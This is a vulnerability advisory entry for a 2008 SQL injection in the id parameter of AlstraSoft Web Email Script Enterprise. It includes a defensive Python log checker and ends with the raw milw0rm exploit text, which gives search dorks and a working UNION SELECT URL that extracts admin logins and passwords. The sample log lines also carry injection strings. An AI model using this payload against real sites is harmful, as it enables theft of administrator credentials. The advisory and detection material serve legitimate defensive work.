Vendor: Web Email Script Enterprise
By: Bgh7
CVSS: 9.3 HIGH
Remote SQL Injection
CWE: 89
Product Name: Web Email Script Enterprise
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:alstrasoft:web_email_script_enterprise
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.

AlstraSoft Web Email Script Enterprise is prone to a remote SQL injection vulnerability in the id parameter because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of AlstraSoft Web Email Script Enterprise.
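
Added example (not part of the original advisory and not AlstraSoft's code): a Python check that flags index.php requests with Act=directory whose id value is not a plain integer, using the same allowlist a server-side fix would enforce before the value reaches a query. The log lines, function names and the 10-digit limit are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [28/Dec/2008:10:01:02 +0000] "GET /index.php?Act=directory&id=12 HTTP/1.1" 200 5120
198.51.100.9 - - [28/Dec/2008:10:01:09 +0000] "GET /index.php?Act=directory&joinstatus=x&id=-1+union+select+1,2,3 HTTP/1.1" 200 7312
198.51.100.9 - - [28/Dec/2008:10:01:15 +0000] "GET /index.php?Act=directory&id=5%20UNION%20SELECT%201 HTTP/1.1" 200 7290
203.0.113.4 - - [28/Dec/2008:10:02:00 +0000] "GET /index.php?Act=inbox&id=abc HTTP/1.1" 200 900
203.0.113.4 - - [28/Dec/2008:10:02:30 +0000] "GET /index.php?Act=directory HTTP/1.1" 200 4100
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_ID = re.compile(r"[0-9]{1,10}")  # allowlist: short non-negative ASCII integer (assumed limit)


def is_valid_id(value):
    """Check an integer key should pass before it is used in any SQL query."""
    return VALID_ID.fullmatch(value) is not None


def suspicious_requests(log_text):
    """Return (client, decoded id) for Act=directory requests whose id is not an integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/index.php"):
            continue
        # parse_qs decodes '+' and %xx, so encoded values are compared in normalised form.
        params = parse_qs(url.query, keep_blank_values=True)
        if "directory" not in params.get("Act", []):
            continue
        for value in params.get("id", []):
            if not is_valid_id(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client}: non-integer id on Act=directory: {value!r}")
```

The check only reports that a non-integer id was sent; whether a given installation is affected still depends on its version.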

Exploit-DB raw data:

--AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.
############################################
Yazar(Auth0r): Bgh7
 
Site: Http://ozelteam.com Turk Bılısım Guclerı
 
PsT: ByBgh7 [at] msn [d0t] c0m
############################################

--Script: http://www.alstrasoft.com/disposable-email-script.htm
 
--Dork: AlstraSoft Web "ESE"

--Dork2: AlstraSoft Web Email Script Enterprise
 
--Expl0it;
--http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
 
#########
column_name
İd
Passwd
#########

# milw0rm.com [2008-12-28]